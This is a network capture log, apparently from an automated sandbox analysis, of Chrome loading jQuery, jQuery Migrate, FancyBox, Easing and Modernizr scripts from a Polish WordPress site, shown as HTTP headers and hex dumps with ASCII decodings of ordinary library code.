                                                            2025-01-15 10:07:57 UTC7905INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 74 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 74 29 26 26 65 2e 74 79 70 65 3d 3d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 67 65 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 21 31 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 3f 22 6c 61 62 65 6c 22 69 6e 20 65 3f 22 6c 61 62 65 6c 22 69 6e 20 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 65 2e 69 73 44 69 73 61 62 6c 65 64 3d 3d 3d 74 7c 7c 65 2e 69 73 44 69 73 61 62 6c 65 64 21 3d 3d 21 74 26 26 61 65 28
                                                            Data Ascii: owerCase();return("input"===t||"button"===t)&&e.type===n}}function ge(t){return function(e){return"form"in e?e.parentNode&&!1===e.disabled?"label"in e?"label"in e.parentNode?e.parentNode.disabled===t:e.disabled===t:e.isDisabled===t||e.isDisabled!==!t&&ae(
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 2c 73 2c 75 2c 6c 3d 79 21 3d 3d 6d 3f 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 3a 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 2c 63 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 78 26 26 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 70 3d 21 6e 26 26 21 78 2c 64 3d 21 31 3b 69 66 28 63 29 7b 69 66 28 79 29 7b 77 68 69 6c 65 28 6c 29 7b 61 3d 65 3b 77 68 69 6c 65 28 61 3d 61 5b 6c 5d 29 69 66 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 21 31 3b 75 3d 6c 3d 22 6f 6e 6c 79 22 3d 3d 3d 68 26 26 21 75 26 26 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 7d 72 65 74 75 72 6e 21 30 7d 69 66 28 75 3d 5b 6d 3f 63 2e 66 69
                                                            Data Ascii: ,s,u,l=y!==m?"nextSibling":"previousSibling",c=e.parentNode,f=x&&e.nodeName.toLowerCase(),p=!n&&!x,d=!1;if(c){if(y){while(l){a=e;while(a=a[l])if(x?a.nodeName.toLowerCase()===f:1===a.nodeType)return!1;u=l="only"===h&&!u&&"nextSibling"}return!0}if(u=[m?c.fi
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 69 65 64 3f 72 2e 76 61 6c 75 65 3a 6e 75 6c 6c 7d 29 2c 73 65 7d 28 43 29 3b 53 2e 66 69 6e 64 3d 64 2c 53 2e 65 78 70 72 3d 64 2e 73 65 6c 65 63 74 6f 72 73 2c 53 2e 65 78 70 72 5b 22 3a 22 5d 3d 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2c 53 2e 75 6e 69 71 75 65 53 6f 72 74 3d 53 2e 75 6e 69 71 75 65 3d 64 2e 75 6e 69 71 75 65 53 6f 72 74 2c 53 2e 74 65 78 74 3d 64 2e 67 65 74 54 65 78 74 2c 53 2e 69 73 58 4d 4c 44 6f 63 3d 64 2e 69 73 58 4d 4c 2c 53 2e 63 6f 6e 74 61 69 6e 73 3d 64 2e 63 6f 6e 74 61 69 6e 73 2c 53 2e 65 73 63 61 70 65 53 65 6c 65 63 74 6f 72 3d 64 2e 65 73 63 61 70 65 3b 76 61 72 20 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 5b 5d 2c 69 3d 76 6f 69 64 20 30 21 3d 3d 6e 3b 77 68 69 6c 65 28 28 65 3d 65 5b
                                                            Data Ascii: ied?r.value:null}),se}(C);S.find=d,S.expr=d.selectors,S.expr[":"]=S.expr.pseudos,S.uniqueSort=S.unique=d.uniqueSort,S.text=d.getText,S.isXMLDoc=d.isXML,S.contains=d.contains,S.escapeSelector=d.escape;var h=function(e,t,n){var r=[],i=void 0!==n;while((e=e[
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 22 2c 42 29 2c 53 2e 72 65 61 64 79 28 29 7d 53 2e 66 6e 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 46 2e 74 68 65 6e 28 65 29 5b 22 63 61 74 63 68 22 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 53 2e 72 65 61 64 79 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 29 2c 74 68 69 73 7d 2c 53 2e 65 78 74 65 6e 64 28 7b 69 73 52 65 61 64 79 3a 21 31 2c 72 65 61 64 79 57 61 69 74 3a 31 2c 72 65 61 64 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 28 21 30 3d 3d 3d 65 3f 2d 2d 53 2e 72 65 61 64 79 57 61 69 74 3a 53 2e 69 73 52 65 61 64 79 29 7c 7c 28 53 2e 69 73 52 65 61 64 79 3d 21 30 29 21 3d 3d 65 26 26 30 3c 2d 2d 53 2e 72 65 61 64 79 57 61 69 74 7c 7c 46 2e 72 65 73 6f 6c 76 65 57 69 74 68 28 45 2c 5b 53 5d 29 7d 7d 29 2c 53 2e 72 65 61
                                                            Data Ascii: ",B),S.ready()}S.fn.ready=function(e){return F.then(e)["catch"](function(e){S.readyException(e)}),this},S.extend({isReady:!1,readyWait:1,ready:function(e){(!0===e?--S.readyWait:S.isReady)||(S.isReady=!0)!==e&&0<--S.readyWait||F.resolveWith(E,[S])}}),S.rea
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 73 2c 6e 2c 72 2c 74 5b 73 5d 2c 6f 29 3b 72 65 74 75 72 6e 20 65 7d 69 66 28 6e 75 6c 6c 3d 3d 72 26 26 6e 75 6c 6c 3d 3d 69 3f 28 69 3d 6e 2c 72 3d 6e 3d 76 6f 69 64 20 30 29 3a 6e 75 6c 6c 3d 3d 69 26 26 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 28 69 3d 72 2c 72 3d 76 6f 69 64 20 30 29 3a 28 69 3d 72 2c 72 3d 6e 2c 6e 3d 76 6f 69 64 20 30 29 29 2c 21 31 3d 3d 3d 69 29 69 3d 54 65 3b 65 6c 73 65 20 69 66 28 21 69 29 72 65 74 75 72 6e 20 65 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 6f 26 26 28 61 3d 69 2c 28 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 28 29 2e 6f 66 66 28 65 29 2c 61 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 67 75 69 64 3d 61 2e 67 75 69 64 7c 7c 28 61 2e 67 75 69 64 3d
                                                            Data Ascii: s,n,r,t[s],o);return e}if(null==r&&null==i?(i=n,r=n=void 0):null==i&&("string"==typeof n?(i=r,r=void 0):(i=r,r=n,n=void 0)),!1===i)i=Te;else if(!i)return e;return 1===o&&(a=i,(i=function(e){return S().off(e),a.apply(this,arguments)}).guid=a.guid||(a.guid=
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 6e 28 65 29 7b 76 61 72 20 74 3d 6e 2e 65 71 28 65 29 3b 68 26 26 28 72 5b 30 5d 3d 64 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 74 2e 68 74 6d 6c 28 29 29 29 2c 48 65 28 74 2c 72 2c 69 2c 6f 29 7d 29 3b 69 66 28 66 26 26 28 74 3d 28 65 3d 78 65 28 72 2c 6e 5b 30 5d 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 21 31 2c 6e 2c 6f 29 29 2e 66 69 72 73 74 43 68 69 6c 64 2c 31 3d 3d 3d 65 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 74 29 2c 74 7c 7c 6f 29 29 7b 66 6f 72 28 73 3d 28 61 3d 53 2e 6d 61 70 28 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 2c 44 65 29 29 2e 6c 65 6e 67 74 68 3b 63 3c 66 3b 63 2b 2b 29 75 3d 65 2c 63 21 3d 3d 70 26 26 28 75 3d 53 2e 63 6c 6f 6e 65 28 75 2c 21 30 2c 21 30 29 2c 73 26 26 53 2e 6d 65 72 67 65 28 61 2c
                                                            Data Ascii: n(e){var t=n.eq(e);h&&(r[0]=d.call(this,e,t.html())),He(t,r,i,o)});if(f&&(t=(e=xe(r,n[0].ownerDocument,!1,n,o)).firstChild,1===e.childNodes.length&&(e=t),t||o)){for(s=(a=S.map(ve(e,"script"),De)).length;c<f;c++)u=e,c!==p&&(u=S.clone(u,!0,!0),s&&S.merge(a,
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 6e 7c 7c 30 21 3d 3d 74 2e 69 6e 64 65 78 4f 66 28 22 62 61 63 6b 67 72 6f 75 6e 64 22 29 7c 7c 28 6c 5b 74 5d 3d 22 69 6e 68 65 72 69 74 22 29 2c 61 26 26 22 73 65 74 22 69 6e 20 61 26 26 76 6f 69 64 20 30 3d 3d 3d 28 6e 3d 61 2e 73 65 74 28 65 2c 6e 2c 72 29 29 7c 7c 28 75 3f 6c 2e 73 65 74 50 72 6f 70 65 72 74 79 28 74 2c 6e 29 3a 6c 5b 74 5d 3d 6e 29 29 7d 7d 2c 63 73 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 76 61 72 20 69 2c 6f 2c 61 2c 73 3d 58 28 74 29 3b 72 65 74 75 72 6e 20 58 65 2e 74 65 73 74 28 74 29 7c 7c 28 74 3d 7a 65 28 73 29 29 2c 28 61 3d 53 2e 63 73 73 48 6f 6f 6b 73 5b 74 5d 7c 7c 53 2e 63 73 73 48 6f 6f 6b 73 5b 73 5d 29 26 26 22 67 65 74 22 69 6e 20 61 26 26 28 69 3d 61 2e 67 65 74 28 65 2c 21 30 2c 6e 29 29 2c 76
                                                            Data Ascii: n||0!==t.indexOf("background")||(l[t]="inherit"),a&&"set"in a&&void 0===(n=a.set(e,n,r))||(u?l.setProperty(t,n):l[t]=n))}},css:function(e,t,n,r){var i,o,a,s=X(t);return Xe.test(t)||(t=ze(s)),(a=S.cssHooks[t]||S.cssHooks[s])&&"get"in a&&(i=a.get(e,!0,n)),v
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 68 69 73 29 2c 6e 3d 74 5b 61 2b 22 71 75 65 75 65 22 5d 2c 72 3d 74 5b 61 2b 22 71 75 65 75 65 48 6f 6f 6b 73 22 5d 2c 69 3d 53 2e 74 69 6d 65 72 73 2c 6f 3d 6e 3f 6e 2e 6c 65 6e 67 74 68 3a 30 3b 66 6f 72 28 74 2e 66 69 6e 69 73 68 3d 21 30 2c 53 2e 71 75 65 75 65 28 74 68 69 73 2c 61 2c 5b 5d 29 2c 72 26 26 72 2e 73 74 6f 70 26 26 72 2e 73 74 6f 70 2e 63 61 6c 6c 28 74 68 69 73 2c 21 30 29 2c 65 3d 69 2e 6c 65 6e 67 74 68 3b 65 2d 2d 3b 29 69 5b 65 5d 2e 65 6c 65 6d 3d 3d 3d 74 68 69 73 26 26 69 5b 65 5d 2e 71 75 65 75 65 3d 3d 3d 61 26 26 28 69 5b 65 5d 2e 61 6e 69 6d 2e 73 74 6f 70 28 21 30 29 2c 69 2e 73 70 6c 69 63 65 28 65 2c 31 29 29 3b 66 6f 72 28 65 3d 30 3b 65 3c 6f 3b 65 2b 2b 29 6e 5b 65 5d 26 26 6e 5b 65 5d 2e 66 69 6e 69 73 68 26 26 6e 5b
                                                            Data Ascii: his),n=t[a+"queue"],r=t[a+"queueHooks"],i=S.timers,o=n?n.length:0;for(t.finish=!0,S.queue(this,a,[]),r&&r.stop&&r.stop.call(this,!0),e=i.length;e--;)i[e].elem===this&&i[e].queue===a&&(i[e].anim.stop(!0),i.splice(e,1));for(e=0;e<o;e++)n[e]&&n[e].finish&&n[
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 78 74 29 2c 6e 5b 64 5d 28 29 2c 65 2e 69 73 50 72 6f 70 61 67 61 74 69 6f 6e 53 74 6f 70 70 65 64 28 29 26 26 66 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 64 2c 78 74 29 2c 53 2e 65 76 65 6e 74 2e 74 72 69 67 67 65 72 65 64 3d 76 6f 69 64 20 30 2c 61 26 26 28 6e 5b 75 5d 3d 61 29 29 2c 65 2e 72 65 73 75 6c 74 7d 7d 2c 73 69 6d 75 6c 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 53 2e 65 78 74 65 6e 64 28 6e 65 77 20 53 2e 45 76 65 6e 74 2c 6e 2c 7b 74 79 70 65 3a 65 2c 69 73 53 69 6d 75 6c 61 74 65 64 3a 21 30 7d 29 3b 53 2e 65 76 65 6e 74 2e 74 72 69 67 67 65 72 28 72 2c 6e 75 6c 6c 2c 74 29 7d 7d 29 2c 53 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 74 72 69 67 67 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74
                                                            Data Ascii: xt),n[d](),e.isPropagationStopped()&&f.removeEventListener(d,xt),S.event.triggered=void 0,a&&(n[u]=a)),e.result}},simulate:function(e,t,n){var r=S.extend(new S.Event,n,{type:e,isSimulated:!0});S.event.trigger(r,null,t)}}),S.fn.extend({trigger:function(e,t


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.1649727178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:57 UTC598OUTGET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:57 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:57 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:02 GMT
                                                            ETag: "2bd8-620a930e6d13a"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 11224
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:07:57 UTC7906INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 33 2e 33 2e 32 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72
                                                            Data Ascii: /*! jQuery Migrate v3.3.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){r
                                                            2025-01-15 10:07:57 UTC3318INData Raw: 53 74 61 74 65 26 26 75 28 22 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 27 6c 6f 61 64 27 2e 2e 2e 29 20 63 61 6c 6c 65 64 20 61 66 74 65 72 20 6c 6f 61 64 20 65 76 65 6e 74 20 6f 63 63 75 72 72 65 64 22 29 2c 48 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 73 2e 65 61 63 68 28 5b 22 6c 6f 61 64 22 2c 22 75 6e 6c 6f 61 64 22 2c 22 65 72 72 6f 72 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 73 2e 66 6e 5b 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 30 29 3b 72 65 74 75 72 6e 22 6c 6f 61 64 22 3d 3d 3d 74 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 5b 30 5d 3f 52 2e 61 70
                                                            Data Ascii: State&&u("jQuery(window).on('load'...) called after load event occurred"),H.apply(this,arguments)},s.each(["load","unload","error"],function(e,t){s.fn[t]=function(){var e=Array.prototype.slice.call(arguments,0);return"load"===t&&"string"==typeof e[0]?R.ap


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.1649729178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:57 UTC602OUTGET /wp-content/plugins/fancy-box/jquery.fancybox.js?ver=1.2.6 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:57 UTC283INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:57 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:38:27 GMT
                                                            ETag: "17f-620a8ae18830e"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 383
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:07:57 UTC383INData Raw: 2f 2a 0a 20 2a 20 46 61 6e 63 79 42 6f 78 20 2d 20 6a 51 75 65 72 79 20 50 6c 75 67 69 6e 0a 20 2a 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 61 6e 63 79 20 6c 69 67 68 74 62 6f 78 20 61 6c 74 65 72 6e 61 74 69 76 65 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 39 20 4a 61 6e 69 73 20 53 6b 61 72 6e 65 6c 69 73 0a 20 2a 20 45 78 61 6d 70 6c 65 73 20 61 6e 64 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 20 61 74 3a 20 68 74 74 70 3a 2f 2f 66 61 6e 63 79 62 6f 78 2e 6e 65 74 0a 20 2a 20 0a 20 2a 20 56 65 72 73 69 6f 6e 3a 20 31 2e 32 2e 36 20 28 31 36 2f 31 31 2f 32 30 30 39 29 0a 20 2a 20 52 65 71 75 69 72 65 73 3a 20 6a 51 75 65 72 79 20 76 31 2e 33 2b 0a 20 2a 20 0a 20 2a 20 44 75 61 6c 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20
                                                            Data Ascii: /* * FancyBox - jQuery Plugin * simple and fancy lightbox alternative * * Copyright (c) 2009 Janis Skarnelis * Examples and documentation at: http://fancybox.net * * Version: 1.2.6 (16/11/2009) * Requires: jQuery v1.3+ * * Dual licensed under


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.1649728178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:57 UTC598OUTGET /wp-content/plugins/fancy-box/jquery.easing.js?ver=1.3 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:57 UTC285INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:57 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:38:26 GMT
                                                            ETag: "1f9c-620a8ae0ccb1e"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 8092
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:07:57 UTC7907INData Raw: 2f 2a 0a 20 2a 20 6a 51 75 65 72 79 20 45 61 73 69 6e 67 20 76 31 2e 33 20 2d 20 68 74 74 70 3a 2f 2f 67 73 67 64 2e 63 6f 2e 75 6b 2f 73 61 6e 64 62 6f 78 2f 6a 71 75 65 72 79 2f 65 61 73 69 6e 67 2f 0a 20 2a 0a 20 2a 20 55 73 65 73 20 74 68 65 20 62 75 69 6c 74 20 69 6e 20 65 61 73 69 6e 67 20 63 61 70 61 62 69 6c 69 74 69 65 73 20 61 64 64 65 64 20 49 6e 20 6a 51 75 65 72 79 20 31 2e 31 0a 20 2a 20 74 6f 20 6f 66 66 65 72 20 6d 75 6c 74 69 70 6c 65 20 65 61 73 69 6e 67 20 6f 70 74 69 6f 6e 73 0a 20 2a 0a 20 2a 20 54 45 52 4d 53 20 4f 46 20 55 53 45 20 2d 20 6a 51 75 65 72 79 20 45 61 73 69 6e 67 0a 20 2a 20 0a 20 2a 20 4f 70 65 6e 20 73 6f 75 72 63 65 20 75 6e 64 65 72 20 74 68 65 20 42 53 44 20 4c 69 63 65 6e 73 65 2e 20 0a 20 2a 20 0a 20 2a 20 43 6f
                                                            Data Ascii: /* * jQuery Easing v1.3 - http://gsgd.co.uk/sandbox/jquery/easing/ * * Uses the built in easing capabilities added In jQuery 1.1 * to offer multiple easing options * * TERMS OF USE - jQuery Easing * * Open source under the BSD License. * * Co
                                                            2025-01-15 10:07:57 UTC185INData Raw: 43 4f 4e 54 52 41 43 54 2c 20 53 54 52 49 43 54 20 4c 49 41 42 49 4c 49 54 59 2c 20 4f 52 20 54 4f 52 54 20 28 49 4e 43 4c 55 44 49 4e 47 0a 20 2a 20 20 4e 45 47 4c 49 47 45 4e 43 45 20 4f 52 20 4f 54 48 45 52 57 49 53 45 29 20 41 52 49 53 49 4e 47 20 49 4e 20 41 4e 59 20 57 41 59 20 4f 55 54 20 4f 46 20 54 48 45 20 55 53 45 20 4f 46 20 54 48 49 53 20 53 4f 46 54 57 41 52 45 2c 20 45 56 45 4e 20 49 46 20 41 44 56 49 53 45 44 20 0a 20 2a 20 4f 46 20 54 48 45 20 50 4f 53 53 49 42 49 4c 49 54 59 20 4f 46 20 53 55 43 48 20 44 41 4d 41 47 45 2e 20 0a 20
                                                            Data Ascii: CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE.


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.1649731178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:57 UTC596OUTGET /wp-content/themes/salient/js/modernizr.js?ver=2.6.2 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:57 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:57 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:04 GMT
                                                            ETag: "434e-620a8e9809222"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 17230
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
